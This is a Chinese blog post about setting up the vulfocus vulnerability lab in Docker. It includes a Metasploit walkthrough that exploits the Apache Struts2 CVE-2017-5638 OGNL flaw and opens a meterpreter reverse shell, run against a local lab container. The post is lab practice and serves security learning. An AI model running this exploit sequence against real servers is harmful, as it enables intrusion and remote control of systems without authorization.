开源漏洞靶场vulfocus的实践(一)

admin 2021年10月31日09:19:33评论974 views1字数 905阅读3分1秒阅读模式

本周末实践的是开源漏洞靶场vulfocus,真是简单易用,以下是实践记录,

搞个ubuntu18.04的虚拟机,安装docker

sudo apt install docker.io,
sudo systemctl enable docker,
sudo gpasswd -a ubuntu docker,
newgrp docker,

下载vulfocus容器镜像,docker pull vulfocus/vulfocus:latest,

启动vulfocus容器实例,

docker run -d -p 8001:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=10.90.11.162 vulfocus/vulfocus,

这就可以访问vulfocus的管理界面了,http://10.90.11.162:8001,

admin/admin,登录进去,首先看镜像管理,开始是空的,点击一键同步,就都出来了,

开源漏洞靶场vulfocus的实践(一)

我习惯用cve-2017-5638做实验,搜一下看有没有,

开源漏洞靶场vulfocus的实践(一)

搜出来的可以点击下载,就自动导入了,也可以手动导入本地的镜像,因为我拿vulfocus自带的cve-2017-5638镜像做攻击验证没成功,就又自己手动导入的piesecurity/apache-struts2-cve-2017-5638,

开源漏洞靶场vulfocus的实践(一)

导入镜像成功后,主页上就能看到并可以启动了,

开源漏洞靶场vulfocus的实践(一)

本地安装个metasploit,进行攻击实验,

msfconsole,
use exploit/multi/http/struts2_content_type_ognl,
set RHOST 10.90.11.162,
set RPORT 34351,
set TARGETURI showcase.jsp,
set LHOST 10.90.11.162,
set payload linux/x64/meterpreter/reverse_tcp,
exploit,

这里需要特别注意的是,需要自己手动docker ps看一下靶机的映射端口,

并通过set RPORT进行配置,攻击成功了就是下面这样,

开源漏洞靶场vulfocus的实践(一)





原文始发于微信公众号(云计算和网络安全技术实践):开源漏洞靶场vulfocus的实践(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月31日09:19:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   开源漏洞靶场vulfocus的实践(一)https://cn-sec.com/archives/606200.html

发表评论

匿名网友 填写信息